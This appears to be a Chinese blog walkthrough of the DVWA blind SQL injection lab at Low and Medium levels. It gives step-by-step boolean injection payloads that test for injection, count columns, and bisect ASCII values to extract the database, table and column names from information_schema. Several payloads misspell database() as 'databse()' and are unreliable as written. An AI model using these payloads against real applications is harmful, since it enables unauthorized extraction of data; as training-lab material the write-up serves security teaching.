2. 程式人生 > 其它 >DVWA-SQL Injection(Blind)

DVWA-SQL Injection(Blind)

阿新 發佈:2021-01-30

LOW

1.判斷是否存在注入
輸入1
在這裡插入圖片描述
顯示使用者存在
輸入1’ and 1 = 1 – ’
在這裡插入圖片描述

顯示使用者存在
輸入1‘ and 1 = 2 – ’
在這裡插入圖片描述
顯示使用者不存在,說明存在字元型的SQL盲注。

2.猜解SQL查詢語句中的欄位數
輸入1’ or 1 = 1 order by 1 – ’
在這裡插入圖片描述
顯示不存在
輸入1’ or 1 = 1 order by 2 – ’
在這裡插入圖片描述
顯示存在
輸入1’ or 1 = 1 order by 3 – ’在這裡插入圖片描述
顯示不存在,說明該SQL查詢語句中只有2個欄位
3.獲取當前資料庫

輸入1’ and ascii(substr(databse(),1,1))>97 -- ',顯示存在,說明資料庫名的第一個字元的ascii值大於97(小寫字母a的ascii值);

輸入1’ and ascii(substr(databse(),1,1))<122 -- ',顯示存在,說明資料庫名的第一個字元的ascii值小於122(小寫字母z的ascii值);

輸入1’ and ascii(substr(databse(),1,1))<109 -- ',顯示存在,說明資料庫名的第一個字元的ascii值小於109(小寫字母m的ascii值);

輸入1’ and ascii(substr(databse(),1,1))<103 -- ',顯示存在,說明資料庫名的第一個字元的ascii值小於103(小寫字母g的ascii值);

輸入1’ and ascii(substr(databse(),1,1))<100 -- ',顯示不存在,說明資料庫名的第一個字元的ascii值不小於100(小寫字母d的ascii值);

輸入1’ and ascii(substr(databse(),1,1))>100 -- ',顯示不存在,說明資料庫名的第一個字元的ascii值不大於100(小寫字母d的ascii值),所以資料庫名的第一個字元的ascii值為100,即小寫字母d。
...
解出資料庫名為’dvwa'

4.獲取資料庫中的表
輸入1’ union select count(table_name),2 from INFORMATION_SCHEMA.tables where table_schema = database() = 1 – ’
在這裡插入圖片描述
顯示不存在
輸入1’ union select count(table_name),2 from INFORMATION_SCHEMA.tables where table_schema = database() = 2 – ’
在這裡插入圖片描述
顯示存在,說明‘dvwa’庫中有2個表

1’ and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1 -- ' 顯示不存在

1’ and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=2 -- ' 顯示不存在

...

1’ and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 -- ' 顯示存在

說明第一個表名長度為9。

1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>97 -- ' 顯示存在

1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<122 -- ' 顯示存在

1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<109 -- ' 顯示存在

1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<103 -- ' 顯示不存在

1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>103 -- ' 顯示不存在

說明第一個表的名字的第一個字元為小寫字母g。

重複上述步驟,即可猜解出兩個表名 guestbook、users。
5.獲取表中欄位名

1’ and (select count(column_name) from information_schema.columns where table_name= ’users’)=1 -- ' 顯示不存在

...

1’ and (select count(column_name) from information_schema.columns where table_name= ’users’)=8 -- ' 顯示存在

說明users表有8個欄位。

1’ and length(substr((select column_name from information_schema.columns where table_name= ’users’ limit 0,1),1))=1 -- ' 顯示不存在

...

1’ and length(substr((select column_name from information_schema.columns where table_name= ’users’ limit 0,1),1))=7 -- ' 顯示存在

說明users表的第一個欄位為7個字元長度。

採用二分法,即可猜解出所有欄位名。

Medium

1.判斷是否存在注入
將id修改為1’ and 1= 1 – ’
在這裡插入圖片描述
顯示不存在
將id修改為 1 and 1 = 1 – ’
在這裡插入圖片描述
顯示存在,說明存在數字型的SQL盲注。
2.猜解SQL查詢語句中的欄位數
輸入1 or 1 = 1 order by 1 – ’
在這裡插入圖片描述
顯示存在
輸入1 or 1 = 1 order by 2 – ’
在這裡插入圖片描述
顯示存在
輸入1 or 1 = 1 order by 3 – ’
在這裡插入圖片描述
顯示不存在,說明該SQL查詢語句中有2個欄位
3.獲取當前資料庫
輸入1’ and ascii(substr(databse(),1,1))>97 – ',顯示存在,說明資料庫名的第一個字元的ascii值大於97(小寫字母a的ascii值);

輸入1 and ascii(substr(databse(),1,1))<122 -- ',顯示存在,說明資料庫名的第一個字元的ascii值小於122(小寫字母z的ascii值);

輸入1 and ascii(substr(databse(),1,1))<109 -- ',顯示存在,說明資料庫名的第一個字元的ascii值小於109(小寫字母m的ascii值);

輸入1 and ascii(substr(databse(),1,1))<103 -- ',顯示存在,說明資料庫名的第一個字元的ascii值小於103(小寫字母g的ascii值);

輸入1 and ascii(substr(databse(),1,1))<100 -- ',顯示不存在,說明資料庫名的第一個字元的ascii值不小於100(小寫字母d的ascii值);

輸入1 and ascii(substr(databse(),1,1))>100 -- ',顯示不存在,說明資料庫名的第一個字元的ascii值不大於100(小寫字母d的ascii值),所以資料庫名的第一個字元的ascii值為100,即小寫字母d。
...
解出資料庫名為’dvwa'

4.獲取資料庫中的表

修改id為1 union select count(table_name),2 from INFORMATION_SCHEMA.tables where table_schema = database() = 1 -- ' 顯示不存在
修改id為1 union select count(table_name),2 from INFORMATION_SCHEMA.tables where table_schema = database() = 2 -- ' 顯示存在

再通過不斷注入查詢確定2個表的表名長度,通過二分法不斷猜解得到表名。
5.獲取表中欄位名

  1 and (select count(column_name) from information_schema.columns where table_name= 0x7573657273)=1 -- ‘ 顯示不存在

    ...

   1 and (select count(column_name) from information_schema.columns where table_name= 0x7573657273)=8 -- ‘顯示存在

說明users表有8個欄位。

1 and length(substr((select column_name from information_schema.columns where table_name= ’users’ limit 0,1),1))=1 -- ' 顯示不存在

...

1 and length(substr((select column_name from information_schema.columns where table_name= ’users’ limit 0,1),1))=7 -- ' 顯示存在

說明users表的第一個欄位為7個字元長度。

採用二分法,即可猜解出所有欄位名。

相關推薦

新手DVWA-SQL Injection (Blind)

SQL Injection (Blind) SQL Injection (Blind)即SQL盲注,同樣是由於web應用程式對使用者輸入資料沒有進行過濾或過濾不完全,導致輸入資料破壞原有SQL語句並執行惡意指令,與SQL注入區別在於SQL盲注沒有回顯,無法直

DVWA——SQL Injection (Blind)(low)

技術標籤:# low安全 SQL Injection (Blind) 介面 原始碼 <?php if( isset( $_GET[ \'Submit\' ] ) ) {

DVWA-SQL Injection(Blind)

LOW 1.判斷是否存在注入 輸入1顯示使用者存在 輸入1’ and 1 = 1 – ’ 顯示使用者存在 輸入1‘ and 1 = 2 – ’顯示使用者不存在,說明存在字元型的SQL盲注。

DVWA-SQL Injection(SQL注入)

sql注入是典型、常見的Web漏洞之一,現在在網路中也可能存在,不過大多數為SQL盲注。

DVWA-SQL Injection (Bind) SQL盲注

盲注同於union select查詢注入,盲注只能得到資料庫回顯的正確和錯誤,利用返回的正確和錯誤一個一個判斷。

DVWA 通關指南:SQL Injection (SQL 注入)

目錄SQL Injection (SQL 注入)Low Level原始碼審計攻擊方法判斷注入型別判斷幾列可控獲取表中的欄位名獲取目標資訊Medium Level原始碼審計攻擊方式判斷注入型別判斷幾列可控獲取表中的欄位名獲取目標資訊High Level原

網路安全知識--PHP程式碼審計/Web For Pantesters 的 SQL injection

SQL 注入一般流程 判斷有無注入 單引號判斷: ?name=root\'對應語句 select * from table where name=\'root\'\' 不符合語法規範,報錯,說明有注入

SQL Injection

環境 虛擬機器 :VMFusion 11.5.0 專業版 使用VMFusion載入OAWAS靶機虛擬機器檔案。 low難度

SQL Injection Diary 4

0x00 What we learned yesterdaty? We\'ve learned how to add data or insert data into a table. Then we learned how to select all data of a table and renew some special data of the table

dvwa sql盲注教程

原文地址:https://www.jianshu.com/p/757626cec742 一、DVWA-SQL Injection(Blind)測試分析 SQL盲注 VS 普通SQL注入:

Druid 的 WallFilter 丟擲 sql injection violation, comment not allow 問題的解決方法

ps: https://github.com/alibaba/druid/wiki/%E9%85%8D%E7%BD%AE-wallfilter可以對應修改引數。 如需要執行多行語句 , 要設定multiStatementAllow為true

MySQL異常 #SQLException: sql injection violation, part alway true condition not allow

1.異常現象Caused by: java.sql.SQLException: sql injection violation, part alway true condition not allow

SQL Injection學習心得(1)

1,與SQL相關的知識點 schemata( ##庫名##意為:提要,綱要,為schema的負數-)庫儲存使用者建立的所有資料庫的苦命,需要記住,該表中記錄資料庫庫名的欄位名為schemata_name(sql對大小寫不敏感)

SQL Injection Attack Lec&Lab SQL注入 Solution Seed

SQL Injection Attack Lec&Lab SQL 注入是一種程式碼注入技術,它利用 Web 應用程式和資料庫伺服器之間的介面中的漏洞。當用戶的輸入在傳送到後端資料庫伺服器之前未在 Web 應用程式中正確檢查時,就會出現此漏洞

補檔--【THM】SQL Injection(SQL注入漏洞)-學習

本文相關的TryHackMe實驗房間連結:https://tryhackme.com/room/sqlinjectionlm 通過學習相關知識點:瞭解如何檢測和利用 SQL 注入漏洞

Web安全-SQL注入:MySQL注入天書(5-6) Blind Injection

文章目錄內容布林型盲注##########注入點判斷撞資料庫版本撞資料庫名使用sqlmap做布林型盲注的猜解

DVWA靶場——Command Injection(命令注入)

概述 Command Injection,即命令注入,是指通過提交惡意構造的引數破壞命令語句結構,從而達到執行惡意命令的目的。PHP命令注入攻擊漏洞是PHP應用程式中常見的指令碼漏洞之一,國內著名的Web應用程式Discuz!、DedeCM

SQL注入之DVWA平臺測試mysql注入

今天主要針對mysql常用注入語句進行測試。測試環境與工具:測試平臺:DVWA,下載地址:http://down.51cto.com/data/875088,也可下載metaspolit-table2虛擬機器,裡面已經部署好了dvwa.。***工具:burpsui

DVWA全級別通關筆記(二)-- Command Injection(命令注入)

引言 結合DVWA提供的命令注入模組,對命令注入漏洞進行學習總結。命令注入(Command Injection)是指通過提交惡意構造的引數破壞命令語句結構,從而達到執行惡意命令的目的。

DVWA中low級別的SQL注入

DVWA中低級別的SQL注入 基於錯誤的注入: 構造特殊的SQL語句注入到資料庫中,看得到的返回資訊,確認注入點,如果資料庫對輸入的某些SQL語句無返回資訊時,可以進行基於時間的注入(sleep函式)